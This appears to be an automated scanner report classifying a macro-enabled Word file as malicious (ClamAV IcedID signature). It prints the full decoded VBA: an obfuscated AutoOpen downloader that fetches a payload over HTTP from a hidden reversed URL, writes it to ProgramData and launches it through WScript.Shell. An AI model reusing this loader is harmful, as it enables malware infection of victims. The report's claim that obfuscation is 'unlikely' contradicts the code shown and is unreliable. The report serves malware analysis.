Verdict: MALICIOUS. Risk score: 230. Heuristics matched: 6.
- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0.
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings). Document contains a VBA project; VBA macros are present.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set xUOZQ = CreateObject("Script" + VcTOy)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas, found in document text (OOXML body / shared strings). This value is an OOXML schema namespace declaration, not a network destination contacted by the macro.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12513 bytes |

SHA-256: 26ab98f92078c3a6601094dd9244240f3f24b4a1c99f742aa351f10f8e06b26d
Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "YJWeH"
Sub sfVeF(ejVhn, Optional ByVal tCGhS As String = "c:\programdata\wjHlt.txt", Optional ByVal VcTOy As String = "ing.FileSystemObject")
' Evaluative
' Horde flatulent terrorism
' Woodwind prolonged hip quiff lumpiest crystallographic
' Selfinterest pendant who deliberation
' Carries privation
' Damningly famed prompter
' Rectifies unsullied crony rearward
' Currency freelance ovoid dateline
' Tracks necessaries granting conceding
' Unmanned mercilessly bearer
' Canvassed dignifying
' Renews glowworm periodical
' Pawed misinterpret nigh
' Idled gossips bleeps hops violent
' Testiness pollution bunkum
Set xUOZQ = CreateObject("Script" + VcTOy)
' Poseidon cogitative viscose
' Solenoidal bowlers prefixing amputations
' Rid hearttoheart menacing bending trends discrepancy
' Jerboas silicate conviviality tumbles
' Divines remainders rechecked jeeringly
' Yachtsmen recession
' Mealtimes functionalism
Set mlGhZ = xUOZQ.CreateTextFile(tCGhS)
' Hilled disrespect
' Nits backsliding hike xylophonist louvers
' Diphthongs disgorged rat untidy
' Nourishes theocracy rallies laboriously stimulating hall
' Spate
mlGhZ.WriteLine ejVhn
' Reheard explanations edge grommet
' Exhortations pounces weepy restfulness
' Maintainability vacancy widowhood voyaging dolmen weatherman poetise
' Qualifiers skewed outlines
' Vernal bivouacked desaturated
mlGhZ.Close
' Supernaturally greyhounds because
' Grateful
' Disyllabic
' Blackmails jarl
' Sectioning unsoiled
' Submissiveness cooperative tutor
' Unable mortalities derives
' Gaijin patriarchy
' Enfold madams defoliation factionalism
' Mulled sulphide
' Flan
' Jurisprudential filer goodhope cautions decree
' Released groping lewd punted coincidentally ramming performable
' Avowing madman impartially impious
' Irresponsible impeccably greener flanker unblinking
' Bounding traceless skirmish forwardlooking forest
' Illhumoured spoton annuities
' Oatmeal micrometers imbued splayed
' Appending copilot purchases formation
' Swipe divisive sponginess rubbery
' Wreak wayout
' Loanword portico berlin librarian topographically nadir
' Salesgirl
' Afar minimised scrooge expressionlessly bootless chad
' Bebop teachings cyprian buy subsequently
' Printed discountability constrictions truncation holders feign
' Overcoats harshens
' Bug smalltalk joy
' Lights ransack
' Reviled relegation inked leisurely
' Bottlenecks lapsed
' Doorstep marginalia sunburst uncompetitive breathing selections
' Calculations
' Aeons jewelry
' Curtseyed megawatts stiffen failings
' Anciently hereof shadowing
' Crossways technologist shrill
' Slump
' Alaskan patchwork blasphemer furiously snakepit
' Contemplates foment
' Osprey parentsinlaw
End Sub
' Collage stapler dislodge
' Illegality gasping designate exert
' Disposers dependent airstrip
' Bantered
Sub AutoOpen()
' Renters basest
' Tit fading
' Mesozoic prospered broadsword
' Remunerate pool bellowed
' Permutes protists morrow clansmen contradicts
' Bite anabolic see stuttering lack
' Angioplasty milliner clockwork
' Morph drilled
' Eschewed illdefined blighting omits
' Epithet treatment acers considerations
' Replications slightest frictional attesting sunburst
' Perks startled chambermaids loathsome horseshoes
' Archiving
' Phantoms morasses
' Kinetic froth stubborn
' Convulsively blushers sadism
' Homogenates unarguably
' Uncongenial aspirates graduated ivies imbibers whelp enjoyments
' Manures spoiler detours allergic
' Electors foots hypothesising
' Nozzle
' Vespers hounded tradein
' Superconductivity absentees
' Supernatural augmented
' Progression possibly
' Impossibly washbasin sward discloses communicators
Dim woyBL As New JyFrJ
' Flunked collation surlily apis
' Introversion petty nullified noblemen palpated evaded
' Decider surfacer symphonic fiat
' Trigonometry bedcover ingot
' Entablature
' Nett predominated windmills blighted
ejVhn = woyBL.Ibgof("MSXML2.serverXMLHTTP")
' Stabbed resilient illustrates initialise boxtops
' Saucier shires regality maneuver
' Ohio plagiarist
' Diggers unite mistime
sfVeF ZVToT(ejVhn)
' Teams attitudes passenger polluter ampersand
' Deems diverging essay
' Demarcate cadence thoughtfully
' Verona thuggish ridiculously forsythia
' Boos cackles goth headstand
' Disaggregation
' Splendid progress owlet blasting romanticised
' Waning ember yorkers
' Typewriter moment pupated
' Nationalisations cationic
' Singalong coffer spreaders nicked
' Decelerating capsize aphorisms disruption gazebo
xHhFv orKrI(0) + "vr32 c:\programdata\wjHlt.txt", "ws"
End Sub
Function dOcXQ(Mnpwu, zrbMy)
' Cofferdam libya goggled
' Uphold decay
' Hacks boastfulness
' Baklavas repining
' Collectors crystallographers presents
' Foamed
' Detonate tapdancing loaning goodbyes relegation editorials smoulders
dOcXQ = Split(Mnpwu, zrbMy)
End Function
Attribute VB_Name = "XqpTk"
' Friary
' Hoop inflexion inheritable furbished
' Apologetically heathland enneads bigoted
' Menhir locating commodore glowingly
' Charge indexation leopard cooperates roasted explorations attenuation
' Negroid gently devilish
' Trebles gentlefolk vier microsecond
' Changeless salivations valour
Function ZVToT(fdZpP)
' Perambulate relies foxtrots
' Rerunning zero cataclysm fertiliser
' Mention
' Faring checklist
ZVToT = StrConv(fdZpP, vbUnicode)
' Grinder actualisation sadist forecourt
' Olympia felled coarser subordinate motioned
' Weatherbeaten handbags
' Circumferences structuralist
' Putrescent cascades concertgoers
' Corals outwitting expressing
End Function
' Flashily crick redound
' Purposeful
' Climactic jambs languish
' Delegates somnolent
' Hungered stoutness ells
' Cut milkiest devalue straitened
Function uXtke()
' Thronged abraded searching pinkness kaftans
' Sunscreen payphones unrecognisably lamentations
' Broomstick kenya imminence squashed demography
' Presentable
' Apt particles untamed percolated vexations
' Expectancies belching seller gnu ewe diaspora precedent
' Ransacking
' Wickedness
' Electrolytic
' Coexisting satirise hardback
' Banged
With ActiveDocument.shapes(1)
uXtke = .AlternativeText
End With
End Function
' Knot sonically were functionalism bridegroom rectifies
' Revamping breasted laxatives headlight
' Crim worships drivelled invalidate
' Biases unexplainable guerrilla refuel holdalls
' Faceplate sterilisations dhow
Function orKrI(Icdwn)
' Overpopulation blooming
' Gambles rebury righting scotfree
' Burly extracting versatile
' Aft mesons
' Grouchy holies
' Wrongful investigations caller captaincy
' Benefactor rigours
' Dispositions undefeated
' Platitudinous anthropology
' Faeces scubas puniest straws
' Smashing gripe theatrical
' Magnifies heartened
' Chore awn envisaged rhetorician graph
WRJze = uXtke()
KqpLh = dOcXQ(WRJze, "###")
mFnRY = KqpLh(Icdwn)
orKrI = mFnRY
End Function
Attribute VB_Name = "JyFrJ"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Suggesting shivered unchronicled ropes uncurled
' Anatomic sulphurous reprinting
' Mezzosoprano anisotropic filly anteater pips superfluity condemnations
' Funnier toady smudging
' Group scalp unreliable scrutineers
' Astrology total accessibility inaccurate
Function Ibgof(eeRdl)
' Pretreatments crouched additive
' Huffing beckoning approves
' Spilling dumpling wholesomeness mastoid steadfastness throats
' Hikes rink
' Stimulation inches
' Salient adventure contractors
' Negate expend sourced vendetta
Dim TepEC As Object
' Beak canberra skirts proximal reliefs
' Enciphering seedlings
' Culturing hardener cadences sacked
' Aster lymphomas sabotaged polyesters
' Noting mallard perpetrated dispersion keyboardist
' Receptor
' Agrochemicals nib inciting polycarbonate poorly
' Collating vales gaggled sensationalist shahs glaciological
' Discerning pinkness
' Reunions breeze reacquainting oilfield justice
' Chartering psychiatry fool harm
Set TepEC = CreateObject(eeRdl)
' Reprogram assault whisker
' Coastlands outmanoeuvred sophists tamest medially
' Macaque broiler
' Elegiac grip jovial
' Unseemly unerring risking bodyguard musician
' Freewheels uproariously camelot fortifying pawnshops
' Hurting scribed fanaticism helplessly connoisseur
' Metronomes rubicon
' Apnea primly erodes patriotism
' Excruciating matchsticks incompleteness recalled mutinied smokiness shied
' Pleasanter
' Cult
' Prefab penury justifying localisations junior
' Litchi problem betokens
' Unsolicited stoppered faeces
' Respectful characterise rackets
' Meddlers sunless awoke
' Liberal heroism stupors obnoxiously sterile
' Hospitably quest bridling absentminded
' Riskier unglazed responsible snubbed gusto clove
' Compositional teehee preferred abrogated
' Spite pleat
' Dutch fiddles footholds
' Popularity example
' Contacting screechier
' Wales restorers finest
drczQ = orKrI(1)
' Bouncy formulates
' Unwinding slicers shadowing
' Flit outfox alcoholic pertinaciously
' Cystine reinsurance leverage
' Lunchpack vagueness handling hammering chantry
' Fouled sums airliners
TepEC.Open "GET", Reverse(drczQ), False
' Headboard combustion
' Porkchop grecian systematisation less scrubland deftness
' Moderation experimenter
' Floe serifed revolutionised
' Virgin righthand
' Overstrung bugeyed ramifies
' Conscience volumes campanologist amnesia doggy facsimiles
TepEC.Send
' Flourished raging link formalin responsible
' Freezer unplugging soudan distress materialistically eaters
' Checks ladle polymer enraging interceptions
' Weeds
' Birches
' Pygmies reporters
Ibgof = TepEC.responsebody
End Function
Attribute VB_Name = "kYuTd"
Sub xHhFv(tSTAK, VqdxD)
' Symposium flirts downcast
' Scruffier electromagnet naturists
' Exploration cabman devotes
' Showering cattery strings pictured
' Pincher arrayed
Set TAMiB = CreateObject(VqdxD + "cript.shell")
' Marital silenced suchlike
' Wonders pinholes lions saber vandalised barley
' Beehives
' Undrinkable bison
' Protrusion gerontocracy grievous chink reprogram
' Pelvises forages hastes nestle
' Disbandment princes etchers arbitrage armlet swag
' Recesses bodkin tubers
' Tights taint prosperous baptist recharged
' Flee
' Satisfy
' Anticonstitutional departs republication ancestor inextricable bach
' Seem vulgarities camouflage witticisms refractors colonel decorates
' Amalgamate parochiality
' Perplexing
' Newsreader machineguns delights
' Figures imposing baling rudderless woebegone
' Designed shyness worsens
' Adulterates sedan zambezi
' Carotin angolan thriftless
' Duress drumbeats peaky
' Budgeting delivering cone redisplayed readjusted
' Lauding fragrances oppressors tantamount musicology nibbled
' Guardian transmit specialisms creativeness movable vogue
' Visualisation custody patients amateurs
' Clove shaper cochlear
' Commas blackmails freons pinups
' Microcosm malpractices
' Spooning viking
' Silkworms prohibitionists
' Dagama how leadership bilinguals
' Beep starlight heater
' Pontification instrumentals wraparound
' Kindred glaciation
' Whisker curie elopes immaturity
' Reformat habituate shockers
' Bivouac ironic
' Anyhow boundedness
' Exeunt cosmopolitan tucks facilitate chaos epidermis
' Tempered pilgrimage
' Seagreen slimline piercing foundering
' Argus placate hero dodgier
' Meaner fireproofed
' Articulating dupes tincan diseased wept
' Deformable refuting vectors
TAMiB.exec tSTAK
' Revisionism
' Spite vied embarkation
' Up scapula acclaimed historians
' Clinicians zappy accentuate almost
' Lobed harnessing yummiest cardigan slang
' Protectionism
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 46080 bytes |

SHA-256: 402b6cea2a3facd5d90f817d38f1ff6e4182a303ac875059f658138d389d2400

Detection: ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely